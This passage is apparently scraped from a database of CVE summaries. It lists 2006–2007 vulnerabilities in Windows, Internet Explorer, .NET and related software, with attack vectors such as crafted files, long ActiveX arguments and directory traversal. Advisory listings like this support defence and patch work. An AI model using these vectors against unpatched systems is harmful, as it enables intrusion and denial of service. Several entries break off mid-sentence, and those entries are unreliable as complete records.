objects, which results in memory corruption, aka the first of two "HTML Objects Memory Corruption Vulnerabilities" and a different issue than CVE-2007-0947. [CVE-2007-0945] Microsoft Internet Explorer 6 SP1 on Windows 2000 SP4 [CVE-2007-0944] Unspecified vulnerability in the CTableCol::OnPropertyChange method in Microsoft Internet Explorer 5.01 SP4 on Windows 2000 SP4 [CVE-2007-0942] Microsoft Internet Explorer 5.01 SP4 on Windows 2000 SP4 [CVE-2007-0878] Unspecified vulnerability in Microsoft Internet Explorer on Windows Mobile 5.0 allows remote attackers to cause a denial of service (loss of browser and other device functionality) via a malformed WML page, related to an "overflow state." NOTE: it is possible that this issue is related to CVE-2007-0685. [CVE-2007-0843] The ReadDirectoryChangesW API function on Microsoft Windows 2000, XP, Server 2003, and Vista does not check permissions for child objects, which allows local users to bypass permissions by opening a directory with LIST (READ) access and using ReadDirectoryChangesW to monitor changes of files that do not have LIST permissions, which can be leveraged to determine filenames, access times, and other sensitive information. [CVE-2007-0811] Microsoft Internet Explorer 6.0 SP1 on Windows 2000, and 6.0 SP2 on Windows XP, allows remote attackers to cause a denial of service (NULL pointer dereference and application crash) via an HTML document containing a certain JavaScript for loop with an empty loop body, possibly involving getElementById. [CVE-2007-0675] A certain ActiveX control in sapi.dll (aka the Speech API) in Speech Components in Microsoft Windows Vista, when the Speech Recognition feature is enabled, allows user-assisted remote attackers to delete arbitrary files, and conduct other unauthorized activities, via a web page with an embedded sound object that contains voice commands to an enabled microphone, allowing for interaction with Windows Explorer. [CVE-2007-0612] Multiple ActiveX controls in Microsoft Windows 2000, XP, 2003, and Vista allows remote attackers to cause a denial of service (Internet Explorer crash) by accessing the bgColor, fgColor, linkColor, alinkColor, vlinkColor, or defaultCharset properties in the (1) giffile, (2) htmlfile, (3) jpegfile, (4) mhtmlfile, (5) ODCfile, (6) pjpegfile, (7) pngfile, (8) xbmfile, (9) xmlfile, (10) xslfile, or (11) wdfile objects in (a) mshtml.dll [CVE-2007-0562] Windows Explorer (explorer.exe) 6.0.2900.2180 in Microsoft Windows XP SP2 allows user-assisted remote attackers to cause a denial of service (application crash) via a crafted .avi file, which triggers the crash when the user right clicks on the file. [CVE-2007-0351] Microsoft Windows XP and Windows Server 2003 do not properly handle user logoff, which might allow local users to gain the privileges of a previous system user, possibly related to user profile unload failure. NOTE: it is not clear whether this is an issue in Windows itself, or an interaction with another product. The issue might involve ZoneAlarm not being able to terminate processes when it cannot prompt the user. [CVE-2007-0214] The HTML Help ActiveX control (Hhctrl.ocx) in Microsoft Windows 2000 SP3, XP SP2 and Professional, 2003 SP1 allows remote attackers to execute arbitrary code via unspecified functions, related to uninitialized parameters. [CVE-2007-0211] The hardware detection functionality in the Windows Shell in Microsoft Windows XP SP2 and Professional, and Server 2003 SP1 allows local users to gain privileges via an unvalidated parameter to a function related to the "detection and registration of new hardware." [CVE-2007-0210] The Window Image Acquisition (WIA) Service in Microsoft Windows XP SP2 allows local users to gain privileges via unspecified vectors involving an "unchecked buffer," probably a buffer overflow. [CVE-2007-0084] DISPUTED Buffer overflow in the Windows NT Message Compiler (MC) 1.00.5239 on Microsoft Windows XP allows local users to gain privileges via a long MC-filename. NOTE: this issue has been disputed by a reliable third party who states that the compiler is not a privileged program, so privilege boundaries cannot be crossed. [CVE-2007-0069] Unspecified vulnerability in the kernel in Microsoft Windows XP SP2, Server 2003, and Vista allows remote attackers to cause a denial of service (CPU consumption) and possibly execute arbitrary code via crafted (1) IGMPv3 and (2) MLDv2 packets that trigger memory corruption, aka "Windows Kernel TCP/IP/IGMPv3 and MLDv2 Vulnerability." [CVE-2007-0066] The kernel in Microsoft Windows 2000 SP4, XP SP2, and Server 2003, when ICMP Router Discovery Protocol (RDP) is enabled, allows remote attackers to cause a denial of service via fragmented router advertisement ICMP packets that trigger an out-of-bounds read, aka "Windows Kernel TCP/IP/ICMP Vulnerability." [CVE-2007-0065] Heap-based buffer overflow in Object Linking and Embedding (OLE) Automation in Microsoft Windows 2000 SP4, XP SP2, Server 2003 SP1 and SP2, Vista, Office 2004 for Mac, and Visual basic 6.0 SP6 allows remote attackers to execute arbitrary code via a crafted script request. [CVE-2007-0064] Heap-based buffer overflow in Windows Media Format Runtime 7.1, 9, 9.5, 9.5 x64 Edition, 11, and Windows Media Services 9.1 for Microsoft Windows 2000, XP, Server 2003, and Vista allows user-assisted remote attackers to execute arbitrary code via a crafted Advanced Systems Format (ASF) file. [CVE-2007-0045] Multiple cross-site scripting (XSS) vulnerabilities in Adobe Acrobat Reader Plugin before 8.0.0, and possibly the plugin distributed with Adobe Reader 7.x before 7.1.4, 8.x before 8.1.7, and 9.x before 9.2, for Mozilla Firefox, Microsoft Internet Explorer 6 SP1, Google Chrome, Opera 8.5.4 build 770, and Opera 9.10.8679 on Windows allow remote attackers to inject arbitrary JavaScript and conduct other attacks via a .pdf URL with a javascript: or res: URI with (1) FDF, (2) XML, and (3) XFDF AJAX parameters, or (4) an arbitrarily named name=URI anchor identifier, aka "Universal XSS (UXSS)." [CVE-2007-0043] The Just In Time (JIT) Compiler service in Microsoft .NET Framework 1.0, 1.1, and 2.0 for Windows 2000, XP, Server 2003, and Vista allows user-assisted remote attackers to execute arbitrary code via unspecified vectors involving an "unchecked buffer," probably a buffer overflow, aka ".NET JIT Compiler Vulnerability". [CVE-2007-0042] Interpretation conflict in ASP.NET in Microsoft .NET Framework 1.0, 1.1, and 2.0 for Windows 2000, XP, Server 2003, and Vista allows remote attackers to access configuration files and obtain sensitive information, and possibly bypass security mechanisms that try to constrain the final substring of a string, via %00 characters, related to use of %00 as a string terminator within POSIX functions but a data character within .NET strings, aka "Null Byte Termination Vulnerability." [CVE-2007-0041] The PE Loader service in Microsoft .NET Framework 1.0, 1.1, and 2.0 for Windows 2000, XP, Server 2003, and Vista allows remote attackers to execute arbitrary code via unspecified vectors involving an "unchecked buffer" and unvalidated message lengths, probably a buffer overflow. [CVE-2007-0040] The LDAP service in Windows Active Directory in Microsoft Windows 2000 Server SP4, Server 2003 SP1 and SP2, Server 2003 x64 Edition and SP2, and Server 2003 for Itanium-based Systems SP1 and SP2 allows remote attackers to execute arbitrary code via a crafted LDAP request with an unspecified number of "convertible attributes." [CVE-2007-0038] Stack-based buffer overflow in the animated cursor code in Microsoft Windows 2000 SP4 through Vista allows remote attackers to execute arbitrary code or cause a denial of service (persistent reboot) via a large length value in the second (or later) anih block of a RIFF .ANI, cur, or .ico file, which results in memory corruption when processing cursors, animated cursors, and icons, a variant of CVE-2005-0416, as originally demonstrated using Internet Explorer 6 and 7. NOTE: this might be a duplicate of CVE-2007-1765 [CVE-2007-0026] The OLE Dialog component in Microsoft Windows 2000 SP4, XP SP2, and 2003 SP1 allows user-assisted remote attackers to execute arbitrary code via an RTF file with a malformed OLE object that triggers memory corruption. [CVE-2007-0025] The MFC component in Microsoft Windows 2000 SP4, XP SP2, and 2003 SP1 and Visual Studio .NET 2000, 2002 SP1, 2003, and 2003 SP1 allows user-assisted remote attackers to execute arbitrary code via an RTF file with a malformed OLE object that triggers memory corruption. NOTE: this might be due to a stack-based buffer overflow in the AfxOleSetEditMenu function in MFC42u.dll. [CVE-2007-0024] Integer overflow in the Vector Markup Language (VML) implementation (vgx.dll) in Microsoft Internet Explorer 5.01, 6, and 7 on Windows 2000 SP4, XP SP2, Server 2003, and Server 2003 SP1 allows remote attackers to execute arbitrary code via a crafted web page that contains unspecified integer properties that cause insufficient memory allocation and trigger a buffer overflow, aka the "VML Buffer Overrun Vulnerability." [CVE-2006-7210] Microsoft Windows 2000, XP, and Server 2003 allows remote attackers to cause a denial of service (cpu consumption) via a PNG image with crafted (1) Width and (2) Height values in the IHDR block. [CVE-2006-7206] Microsoft Internet Explorer 6 on Windows XP SP2 allows remote attackers to cause a denial of service (crash) by creating a ADODB.Recordset object and making a series of calls to the NextRecordset method with a long string argument, which causes an "invalid memory access" in the SysFreeString function, a different issue than CVE-2006-3510 and CVE-2006-3899. [CVE-2006-7066] Microsoft Internet Explorer 6 on Windows XP SP2 allows remote attackers to cause a denial of service (crash) by creating an object inside an iframe, deleting the frame by setting its location.href to about:blank, then accessing a property of the object within the deleted frame, which triggers a NULL pointer dereference. NOTE: it was later reported that 7.0.6000.16473 and earlier are also affected. [CVE-2006-6902] Unspecified vulnerability in the Bluetooth stack in Microsoft Windows Mobile Pocket PC edition allows remote attackers to gain administrative access (aka Remote Root) via unspecified vectors. [CVE-2006-6901] Unspecified vulnerability in the Bluetooth stack in Microsoft Windows allows remote attackers to gain administrative access (aka Remote Root) via unspecified vectors. [CVE-2006-6797] The Client Server Run-Time Subsystem (CSRSS) in Microsoft Windows allows local users to cause a denial of service (crash) or read arbitrary memory from csrss.exe via crafted arguments to the NtRaiseHardError function with status 0x50000018, a different vulnerability than CVE-2006-6696. [CVE-2006-6753] Event Viewer (eventvwr.exe) in Microsoft Windows does not properly display log data that contains '%' (percent) characters, which might make it impossible to use Event Viewer to determine the actual data that triggered an event, and might produce long strings that are not properly handled by certain processes that rely on Event Viewer. [CVE-2006-6696] Double free vulnerability in Microsoft Windows 2000, XP, 2003, and Vista allows local users to gain privileges by calling the MessageBox function with a MB_SERVICE_NOTIFICATION message with crafted data, which sends a HardError message to Client/Server Runtime Server Subsystem (CSRSS) process, which is not properly handled when invoking the UserHardError and GetHardErrorText functions in WINSRV.DLL. [CVE-2006-6659] The Microsoft Office Outlook Recipient ActiveX control (ole32.dll) in Windows XP SP2 allows remote attackers to cause a denial of service (Internet Explorer 7 hang) via crafted HTML. [CVE-2006-6602] explorer.exe in Windows Explorer 6.00.2900.2180 in Microsoft Windows XP SP2 allows user-assisted remote attackers to cause a denial of service via a crafted WMV file. [CVE-2006-6601] Windows Media Player 10.00.00.4036 in Microsoft Windows XP SP2 allows user-assisted remote attackers to cause a denial of service via a .MID (MIDI) file with a malformed header chunk without any track chunks, possibly involving (1) number of tracks of (2) time division fields that are set to 0. [CVE-2006-6579] Microsoft Windows XP has weak permissions (FILE_WRITE_DATA and FILE_READ_DATA for Everyone) for %WINDIR%\pchealth\ERRORREP\QHEADLES, which allows local users to write and read files in this folder, as demonstrated by an ASP shell that has write access by IWAM_machine and read access by IUSR_Machine. [CVE-2006-6252] Microsoft Windows Live Messenger 8.0 and earlier, when gestual emoticons are enabled, allows remote attackers to cause a denial of service (CPU consumption) via a long string composed of ":D" sequences, which are interpreted as emoticons. [CVE-2006-6134] Heap-based buffer overflow in the WMCheckURLScheme function in WMVCORE.DLL in Microsoft Windows Media Player (WMP) 10.00.00.4036 on Windows XP SP2, Server 2003, and Server 2003 SP1 allows remote attackers to cause a denial of service (application crash) and execute arbitrary code via a long HREF attribute, using an unrecognized protocol, in a REF element in an ASX PlayList file. [CVE-2006-5758] The Graphics Rendering Engine in Microsoft Windows 2000 through 2000 SP4 and Windows XP through SP2 maps GDI Kernel structures on a global shared memory section that is mapped with read-only permissions, but can be remapped by other processes as read-write, which allows local users to cause a denial of service (memory corruption and crash) and gain privileges by modifying the kernel structures. [CVE-2006-5745] Unspecified vulnerability in the setRequestHeader method in the XMLHTTP (XML HTTP) ActiveX Control 4.0 in Microsoft XML Core Services 4.0 on Windows, when accessed by Internet Explorer, allows remote attackers to execute arbitrary code via crafted arguments that lead to memory corruption, a different vulnerability than CVE-2006-4685. NOTE: some of these details are obtained from third party information. [CVE-2006-5614] Microsoft Windows NAT Helper Components (ipnathlp.dll) on Windows XP SP2, when Internet Connection Sharing is enabled, allows remote attackers to cause a denial of service (svchost.exe crash) via a malformed DNS query, which results in a null pointer dereference. [CVE-2006-5586] The Graphics Rendering Engine in Microsoft Windows 2000 SP4 and XP SP2 allows local users to gain privileges via "invalid application window sizes" in layered application windows, aka the "GDI Invalid Window Size Elevation of Privilege Vulnerability." [CVE-2006-5585] The Client-Server Run-time Subsystem in Microsoft Windows XP SP2 and Server 2003 allows local users to gain privileges via a crafted file manifest within an application, aka "File Manifest Corruption Vulnerability." [CVE-2006-5584] The Remote Installation Service (RIS) in Microsoft Windows 2000 SP4 uses a TFTP server that allows anonymous access, which allows remote attackers to upload and overwrite arbitrary files to gain privileges on systems that use RIS. [CVE-2006-5583] Buffer overflow in the SNMP Service in Microsoft Windows 2000 SP4, XP SP2, Server 2003, Server 2003 SP1, and possibly other versions allows remote attackers to execute arbitrary code via a crafted SNMP packet, aka "SNMP Memory Corruption Vulnerability." [CVE-2006-5448] The drmstor.dll ActiveX object in Microsoft Windows Digital Rights Management System (DRM) allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via a long parameter to the StoreLicense function, which triggers "memory corruption" and possibly a buffer overflow. [CVE-2006-5270] Integer overflow in the Microsoft Malware Protection Engine (mpengine.dll), as used by Windows Live OneCare, Antigen, Defender, and Forefront Security, allows user-assisted remote attackers to execute arbitrary code via a crafted PDF file. [CVE-2006-5028] Directory traversal vulnerability in filemanager/filemanager.php in SWsoft Plesk 7.5 Reload and Plesk 7.6 for Microsoft Windows allows remote attackers to list arbitrary directories via a ../ (dot dot slash) in the file parameter in a chdir action. [CVE-2006-4868] Stack-based buffer overflow in the Vector Graphics Rendering engine (vgx.dll), as used in Microsoft Outlook and Internet Explorer 6.0 on Windows XP SP2, and possibly other versions, allows remote attackers to execute arbitrary code via a Vector Markup Language (VML) file with a long fill parameter within a rect tag. [CVE-2006-4702] Buffer overflow in the Windows Media Format Runtime in Microsoft Windows Media Player (WMP) 6.4 and Windows XP SP2, Server 2003, and Server 2003 SP1 allows remote attackers to execute arbitrary code via a crafted Advanced Systems Format (ASF) file. [CVE-2006-4696] Unspecified vulnerability in the Server service in Microsoft Windows 2000 SP4, Server 2003 SP1 and earlier, and XP SP2 and earlier allows remote attackers to execute arbitrary code via a crafted packet, aka "SMB Rename Vulnerability." [CVE-2006-4694] Unspecified vulnerability in PowerPoint in Microsoft Office 2000, Office XP and Office 2003 allows user-assisted attackers to execute arbitrary code via a crafted record in a PPT file, as exploited by malware such as Exploit:Win32/Controlppt.W, Exploit:Win32/Controlppt.X, and Exploit-PPT.d/Trojan.PPDropper.F. NOTE: it has been reported that the attack vector involves SlideShowWindows.View.GotoNamedShow. [CVE-2006-4692] Argument injection vulnerability in the Windows Object Packager (packager.exe) in Microsoft Windows XP SP1 and SP2 and Server 2003 SP1 and earlier allows remote user-assisted attackers to execute arbitrary commands via a crafted file with a "/" (slash) character in the filename of the Command Line property, followed by a valid file extension, which causes the command before the slash to be executed, aka "Object Packager Dialogue Spoofing Vulnerability." [CVE-2006-4689] Unspecified vulnerability in the driver for the Client Service for NetWare (CSNW) in Microsoft Windows 2000 SP4, XP SP2, and Server 2003 up to SP1 allows remote attackers to cause a denial of service (hang and reboot) via has unknown attack vectors, aka "NetWare Driver Denial of Service Vulnerability." [CVE-2006-4688] Buffer overflow in Client Service for NetWare (CSNW) in Microsoft Windows 2000 SP4, XP SP2, and Server 2003 up to SP1 allows remote attackers to execute arbitrary code via crafted messages, aka "Client Service for NetWare Memory Corruption Vulnerability." [CVE-2006-4495] Microsoft Internet Explorer allows remote attackers to cause a denial of service (memory corruption) and possibly execute arbitrary code by instantiating certain Windows 2000 ActiveX COM Objects including (1) ciodm.dll, (2) myinfo.dll, (3) msdxm.ocx, and (4) creator.dll. [CVE-2006-4219] The Terminal Services COM object (tsuserex.dll) allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code by instantiating it as an ActiveX object in Internet Explorer 6.0 SP1 on Microsoft Windows 2003 EE SP1 CN. [CVE-2006-4138] Multiple unspecified vulnerabilities in Microsoft Windows Help File viewer (winhlp32.exe) allow user-assisted attackers to execute arbitrary code via crafted HLP files. [CVE-2006-4128] Multiple heap-based buffer overflows in Symantec VERITAS Backup Exec for Netware Server Remote Agent for Windows Server 9.1 and 9.2 (all builds), Backup Exec Continuous Protection Server Remote Agent for Windows Server 10.1 (builds 10.1.325.6301, 10.1.326.1401, 10.1.326.2501, 10.1.326.3301, and 10.1.327.401), and Backup Exec for Windows Server and Remote Agent 9.1 (build 9.1.4691), 10.0 (builds 10.0.5484 and 10.0.5520), and 10.1 (build 10.1.5629) allow remote attackers to cause a denial of service (application crash) and possibly execute arbitrary code via a crafted RPC message. [CVE-2006-4071] Sign extension vulnerability in the createBrushIndirect function in the GDI library (gdi32.dll) in Microsoft Windows XP, Server 2003, and possibly other versions, allows user-assisted attackers to cause a denial of service (application crash) via a crafted WMF file. [CVE-2006-4066] The Graphical Device Interface Plus library (gdiplus.dll) in Microsoft Windows XP SP2 allows context-dependent attackers to cause a denial of service (application crash) via certain images that trigger a divide-by-zero error, as demonstrated by a (1) .ico file, (2) .png file that crashes MSN Messenger, and (3) .jpg file that crashes Internet Explorer. NOTE: another researcher has not been able to reproduce this issue. [CVE-2006-3992] Unspecified vulnerability in the Centrino (1) w22n50.sys, (2) w22n51.sys, (3) w29n50.sys, and (4) w29n51.sys Microsoft Windows drivers for Intel 2200BG and 2915ABG PRO/Wireless Network Connection before 10.5 with driver 9.0.4.16 allows remote attackers to execute arbitrary code via certain frames that trigger memory corruption. [CVE-2006-3944] Microsoft Internet Explorer 6 on Windows XP SP2 allows remote attackers to cause a denial of service (crash) via a (1) Forms.ListBox.1 or (2) Forms.ListBox.1 object with the ListWidth property set to (a) 0x7fffffff, which triggers an integer overflow exception, or to (b) 0x7ffffffe, which triggers a null dereference. [CVE-2006-3943] Stack-based buffer overflow in NDFXArtEffects in Microsoft Internet Explorer 6 on Windows XP SP2 allows remote attackers to cause a denial of service (crash) via long (1) RGBExtraColor, (2) RGBForeColor, and (3) RGBBackColor properties. [CVE-2006-3942] The server driver (srv.sys) in Microsoft Windows NT 4.0, 2000, XP, and Server 2003 allows remote attackers to cause a denial of service (system crash) via an SMB_COM_TRANSACTION SMB message that contains a string without null character termination, which leads to a NULL dereference in the ExecuteTransaction function, possibly related to an "SMB PIPE," aka the "Mailslot DOS" vulnerability. NOTE: the name "Mailslot DOS" was derived from incomplete initial research [CVE-2006-3915] Microsoft Internet Explorer 6 on Windows XP SP2 allows remote attackers to cause a denial of service (crash) by iterating over any native function, as demonstrated with the window.alert function, which triggers a null dereference. [CVE-2006-3899] Microsoft Internet Explorer 6.0 on Windows XP SP2 allows remote attackers to cause a denial of service (application crash) by calling the stringToBinary function of the CEnroll.CEnroll.2 ActiveX object with a long second argument, which triggers an invalid memory access inside the SysAllocStringLen function. [CVE-2006-3898] Microsoft Internet Explorer 6.0 on Windows XP SP2 allows remote attackers to cause a denial of service (application crash) by calling the Click method of the Internet.HHCtrl.1 ActiveX object before initializing the URL, which triggers a null dereference. [CVE-2006-3897] Stack overflow in Microsoft Internet Explorer 6 on Windows 2000 allows remote attackers to cause a denial of service (application crash) by creating an NMSA.ASFSourceMediaDescription.1 ActiveX object with a long dispValue property. [CVE-2006-3880] DISPUTED Microsoft Windows NT 4.0, Windows 2000, Windows XP, and Windows Small Business Server 2003 allow remote attackers to cause a denial of service (IP stack hang) via a continuous stream of packets on TCP port 135 that have incorrect TCP header checksums and random numbers in certain TCP header fields, as demonstrated by the Achilles Windows Attack Tool. NOTE: the researcher reports that the Microsoft Security Response Center has stated "Our investigation which has included code review, review of the TCPDump, and attempts on reproing the issue on multiple fresh installs of various Windows Operating Systems have all resulted in non confirmation." [CVE-2006-3873] Heap-based buffer overflow in URLMON.DLL in Microsoft Internet Explorer 6 SP1 on Windows 2000 and XP SP1, with versions the MS06-042 patch before 20060912, allows remote attackers to cause a denial of service (crash) or execute arbitrary code via a long URL in a GZIP-encoded website that was the target of an HTTP redirect, due to an incomplete fix for CVE-2006-3869. [CVE-2006-3869] Heap-based buffer overflow in URLMON.DLL in Microsoft Internet Explorer 6 SP1 on Windows 2000 and XP SP1, with versions the MS06-042 patch before 20060824, allows remote attackers to cause a denial of service (crash) or execute arbitrary code via a long URL on a website that uses HTTP 1.1 compression. [CVE-2006-3730] Integer overflow in Microsoft Internet Explorer 6 on Windows XP SP2 allows remote attackers to cause a denial of service (crash) and execute arbitrary code via a 0x7fffffff argument to the setSlice method on a WebViewFolderIcon ActiveX object, which leads to an invalid memory copy. [CVE-2006-3648] Unspecified vulnerability in Microsoft Windows 2000 SP4, XP SP1 and SP2, Server 2003 and 2003 SP1, allows remote attackers to execute arbitrary code via unspecified vectors involving unhandled exceptions, memory resident applications, and incorrectly "unloading chained exception." [CVE-2006-3643] Cross-site scripting (XSS) vulnerability in Internet Explorer 5.01 and 6 in Microsoft Windows 2000 SP4 permits access to local "HTML-embedded resource files" in the Microsoft Management Console (MMC) library, which allows remote authenticated users to execute arbitrary commands, aka "MMC Redirect Cross-Site Scripting Vulnerability." [CVE-2006-3510] The Remote Data Service Object (RDS.DataControl) in Microsoft Internet Explorer 6 on Windows 2000 allows remote attackers to cause a denial of service (crash) via a series of operations that result in an invalid length calculation when using SysAllocStringLen, then triggers a buffer over-read. [CVE-2006-3471] Microsoft Internet Explorer 6 on Windows XP allows remote attackers to cause a denial of service (crash) via a table with a frameset as a child, which triggers a null dereference, as demonstrated using the appendChild method. [CVE-2006-3448] Buffer overflow in the Step-by-Step Interactive Training in Microsoft Windows 2000 SP4, XP SP2 and Professional, and Server 2003 SP1 allows remote attackers to execute arbitrary code via a long Syllabus string in crafted bookmark link files (cbo, cbl, or .cbm), a different issue than CVE-2005-1212. [CVE-2006-3445] Integer overflow in the ReadWideString function in agentdpv.dll in Microsoft Agent on Microsoft Windows 2000 SP4, XP SP2, and Server 2003 up to SP1 allows remote attackers to execute arbitrary code via a large length value in an .ACF file, which results in a heap-based buffer overflow. [CVE-2006-3444] Unspecified vulnerability in the kernel in Microsoft Windows 2000 SP4, probably a buffer overflow, allows local users to obtain privileges via unspecified vectors involving an "unchecked buffer." [CVE-2006-3443] Untrusted search path vulnerability in Winlogon in Microsoft Windows 2000 SP4, when SafeDllSearchMode is disabled, allows local users to gain privileges via a malicious DLL in the UserProfile directory, aka "User Profile Elevation of Privilege Vulnerability." [CVE-2006-3442] Unspecified vulnerability in Pragmatic General Multicast (PGM) in Microsoft Windows XP SP2 and earlier allows remote attackers to execute arbitrary code via a crafted multicast message. [CVE-2006-3441] Buffer overflow in the DNS Client service in Microsoft Windows 2000 SP4, XP SP1 and SP2, and Server 2003 SP1 allows remote attackers to execute arbitrary code via a crafted record response. NOTE: while MS06-041 implies that there is a single issue, there are multiple vectors, and likely multiple vulnerabilities, related to (1) a heap-based buffer overflow in a DNS server response to the client, (2) a DNS server response with malformed ATMA records, and (3) a length miscalculation in TXT, HINFO, X25, and ISDN records. [CVE-2006-3440] Buffer overflow in the Winsock API in Microsoft Windows 2000 SP4, XP SP1 and SP2, and Server 2003 SP1 allows remote attackers to execute arbitrary code via unknown vectors, aka "Winsock Hostname Vulnerability." [CVE-2006-3209] DISPUTED The Task scheduler (at.exe) on Microsoft Windows XP spawns each scheduled process with SYSTEM permissions, which allows local users to gain privileges. NOTE: this issue has been disputed by third parties, who state that the Task scheduler is limited to the Administrators group by default upon installation. [CVE-2006-2766] Buffer overflow in INETCOMM.DLL, as used in Microsoft Internet Explorer 6.0 through 6.0 SP2, Windows Explorer, Outlook Express 6, and possibly other programs, allows remote user-assisted attackers to cause a denial of service (application crash) via a long mhtml URI in the URL value in a URL file. [CVE-2006-2386] Unspecified vulnerability in Microsoft Outlook Express 6 and earlier allows remote attackers to execute arbitrary code via a crafted contact record in a Windows Address Book (WAB) file. [CVE-2006-2379] Buffer overflow in the TCP/IP Protocol driver in Microsoft Windows 2000 SP4, XP SP1 and SP2, and Server 2003 SP1 and earlier allows remote attackers to execute arbitrary code via unknown vectors related to IP source routing. [CVE-2006-2378] Buffer overflow in the ART Image Rendering component (jgdw400.dll) in Microsoft Windows XP SP1 and Sp2, Server 2003 SP1 and earlier, and Windows 98 and Me allows remote attackers to execute arbitrary code via a crafted ART image that causes heap corruption. [CVE-2006-2376] Integer overflow in the PolyPolygon function in Graphics Rendering Engine on Microsoft Windows 98 and Me allows remote attackers to execute arbitrary code via a Windows Metafile (WMF) or EMF image with a sum of entries in the vertext counts array and number of polygons that triggers a heap-based buffer overflow. [CVE-2006-2374] The Server Message Block (SMB) driver (MRXSMB.SYS) in Microsoft Windows 2000 SP4, XP SP1 and SP2, and Server 2003 SP1 and earlier allows local users to cause a denial of service (hang) by calling the MrxSmbCscIoctlCloseForCopyChunk with the file handle of the shadow device, which results in a deadlock, aka the "SMB Invalid Handle Vulnerability." [CVE-2006-2373] The Server Message Block (SMB) driver (MRXSMB.SYS) in Microsoft Windows 2000 SP4, XP SP1 and SP2, and Server 2003 SP1 and earlier allows local users to execute arbitrary code by calling the MrxSmbCscIoctlOpenForCopyChunk function with the METHOD_NEITHER method flag and an arbitrary address, possibly for kernel memory, aka the "SMB Driver Elevation of Privilege Vulnerability." [CVE-2006-2372] Buffer overflow in the DHCP Client service for Microsoft Windows 2000 SP4, Windows XP SP1 and SP2, and Server 2003 up to SP1 allows remote attackers to execute arbitrary code via a crafted DHCP response. [CVE-2006-2334] The RtlDosPathNameToNtPathName_U API function in NTDLL.DLL in Microsoft Windows 2000 SP4 and XP SP2 does not properly convert DOS style paths with trailing spaces into NT style paths, which allows context-dependent attackers to create files that cannot be accessed through the expected DOS path or prevent access to other similarly named files in the same directory, which prevents those files from being detected or disinfected by certain anti-virus and anti-spyware software. [CVE-2006-2218] Unspecified vulnerability in Internet Explorer 6.0 on Microsoft Windows XP SP2 allows remote attackers to execute arbitrary code via "exceptional conditions" that trigger memory corruption, as demonstrated using an exception handler and nested object tags, a variant of CVE-2006-1992. [CVE-2006-2094] Microsoft Internet Explorer before Windows XP Service Pack 2 and Windows Server 2003 Service Pack 1, when Prompt is configured in Security Settings, uses modal dialogs to verify that a user wishes to run an ActiveX control or perform other risky actions, which allows user-assisted remote attackers to construct a race condition that tricks a user into clicking an object or pressing keys that are actually applied to a "Yes" approval for executing the control. [CVE-2006-2056] Argument injection vulnerability in Internet Explorer 6 for Windows XP SP2 allows user-assisted remote attackers to modify command line arguments to an invoked mail client via " (double quote) characters in a mailto: scheme handler, as demonstrated by launching Microsoft Outlook with an arbitrary filename as an attachment. NOTE: it is not clear whether this issue is implementation-specific or a problem in the Microsoft API. [CVE-2006-1654] Directory traversal vulnerability in the HP Color LaserJet 2500 Toolbox and Color LaserJet 4600 Toolbox on Microsoft Windows before 20060402 allows remote attackers to read arbitrary files via a .. (dot dot) in an HTTP GET request to TCP port 5225. [CVE-2006-1651] DISPUTED Microsoft ISA Server 2004 allows remote attackers to bypass certain filtering rules, including ones for (1) ICMP and (2) TCP, via IPv6 packets. NOTE: An established researcher has disputed this issue, saying that "Neither ISA Server 2004 nor Windows 2003 Basic Firewall support IPv6 filtering ... This is different network protocol." [CVE-2006-1591] Heap-based buffer overflow in Microsoft Windows Help winhlp32.exe allows user-assisted attackers to execute arbitrary code via crafted embedded image data in a .hlp file. [CVE-2006-1510] Buffer overflow in calloc.c in the Microsoft Windows XP SP2 ntdll.dll system library, when used by the ILDASM disassembler in the Microsoft .NET 1.0 and 1.1 SDK, might allow user-assisted attackers to execute arbitrary code via a crafted .dll file with a large static method. [CVE-2006-1476] Windows Firewall in Microsoft Windows XP SP2 produces incorrect application block alerts when the application filename is ".exe" (with no characters before the "."), which might allow local user-assisted users to trick a user into unblocking a Trojan horse program, as demonstrated by a malicious ".exe" program in a folder named "Internet Explorer," which triggers a question about whether to unblock the "Internet Explorer" program. [CVE-2006-1475] Windows Firewall in Microsoft Windows XP SP2 does not produce application alerts when an application is executed using the NTFS Alternate Data Streams (ADS) filename:stream syntax, which might allow local users to launch a Trojan horse attack in which the victim does not obtain the alert that Windows Firewall would have produced for a non-ADS file. [CVE-2006-1315] The Server Service (SRV.SYS driver) in Microsoft Windows 2000 SP4, XP SP1 and SP2, Server 2003 up to SP1, and other products, allows remote attackers to obtain sensitive information via crafted requests that leak information in SMB buffers, which are not properly initialized, aka "SMB Information Disclosure Vulnerability." [CVE-2006-1314] Heap-based buffer overflow in the Server Service (SRV.SYS driver) in Microsoft Windows 2000 SP4, XP SP1 and SP2, Server 2003 up to SP1, and other products, allows remote attackers to execute arbitrary code via crafted first-class Mailslot messages that triggers memory corruption and bypasses size restrictions on second-class Mailslot messages. [CVE-2006-1313] Microsoft JScript 5.1, 5.5, and 5.6 on Windows 2000 SP4, and 5.6 on Windows XP, Server 2003, Windows 98 and Windows Me, will "release objects early" in certain cases, which results in memory corruption and allows remote attackers to execute arbitrary code. [CVE-2006-1311] The RichEdit component in Microsoft Windows 2000 SP4, XP SP2, and 2003 SP1 [CVE-2006-1300] Microsoft .NET framework 2.0 (ASP.NET) in Microsoft Windows 2000 SP4, XP SP1 and SP2, and Server 2003 up to SP1 allows remote attackers to bypass access restrictions via unspecified "URL paths" that can access Application Folder objects "explicitly by name." [CVE-2006-1184] Microsoft Distributed Transaction Coordinator (MSDTC) for Windows NT 4.0, 2000 SP4, XP SP1 and SP2, and Server 2003 allows remote attackers to cause a denial of service (crash) via a BuildContextW request with a large (1) UuidString or (2) GuidIn of a certain length, which causes an out-of-range memory access, aka the MSDTC Denial of Service Vulnerability. NOTE: this is a variant of CVE-2005-2119. [CVE-2006-0988] The default configuration of the DNS Server service on Windows Server 2003 and Windows 2000, and the Microsoft DNS Server service on Windows NT 4.0, allows recursive queries and provides additional delegation information to arbitrary IP addresses, which allows remote attackers to cause a denial of service (traffic amplification) via DNS queries with spoofed source IP addresses. [CVE-2006-0753] Memory leak in Microsoft Internet Explorer 6 for Windows XP Service Pack 2 allows remote attackers to cause a denial of service (memory consumption) via JavaScript that uses setInterval to repeatedly call a function to set the value of window.status. [CVE-2006-0561] Cisco Secure Access Control Server (ACS) 3.x for Windows stores ACS administrator passwords and the master key in the registry with insecure permissions, which allows local users and remote administrators to decrypt the passwords by using Microsoft's cryptographic API functions to obtain the plaintext version of the master key. 